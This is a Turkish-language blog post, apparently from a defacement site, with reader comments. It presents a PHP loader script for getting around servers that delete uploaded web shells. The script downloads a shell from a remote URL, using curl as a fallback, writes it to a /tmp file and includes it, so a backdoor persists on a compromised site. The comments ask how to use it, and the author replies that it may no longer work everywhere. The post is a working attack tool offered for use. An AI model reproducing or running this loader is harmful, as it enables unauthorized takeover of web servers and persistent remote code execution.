Diyelim bir sitenin upload kısmından shell upload ediyorsunuz fakat server bunu otomatik olarak siliyor ve sizde shell yükleyemediğiniz için server a etki edemiyorsunuz. Aşağıdaki script in olayı https://www .scorpioldefacer. com/shellyolu.txt olarak belirttiğiniz yerdeki shell i tmp dizinine atıyor ve script sayesinde sizin shell i upload ettiğiniz php dosyası üzerinden çalışıyor. Yani aslında shell tmp dizinine gidiyor siz sadece shell i çağıran bir php dosyası üzerinden işlem yapıyorsunuz.
<?php //*thanx for idx $URL = ’http://www.website.com/shellyolu.txt’; $TMP = ’/tmp/sess_’.md5($_SERVER[’HTTP_HOST’]).’.php’; # dont change this !! function M() { $FGT = @file_get_contents($GLOBALS[’URL’]); if(!$FGT) { echo `curl -k $(echo {$GLOBALS[’URL’]} | base64 -d) > {$GLOBALS[’TMP’]}`; } else { $HANDLE = fopen($GLOBALS[’TMP’], ’w’); fwrite($HANDLE, $FGT); fclose($HANDLE); } echo ’<script>window.location="?nako=login";</script>’; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); } ?>
çok karışık anlatmışsın hiçbir şey anlamadım
YanıtlaSilŞimdi dostum.
YanıtlaSil1)Shellimi, alfashell.php olarak sunucuya upload ettim. Senin verdiğin kodun içerisine "http://www.website.com/alfashell.php" olarak mı yazacağım???
2)Senin verdiğin kodları hangi isimle ve uzantıyla kaydedeceğim?
3)Yöntem hala çalışıyor mu?
Php
SilEskiden çalışıyordu artık sistemlerde değişme olduğu için bazı sunucularda işe yaramayabilir
SilYorum Gönder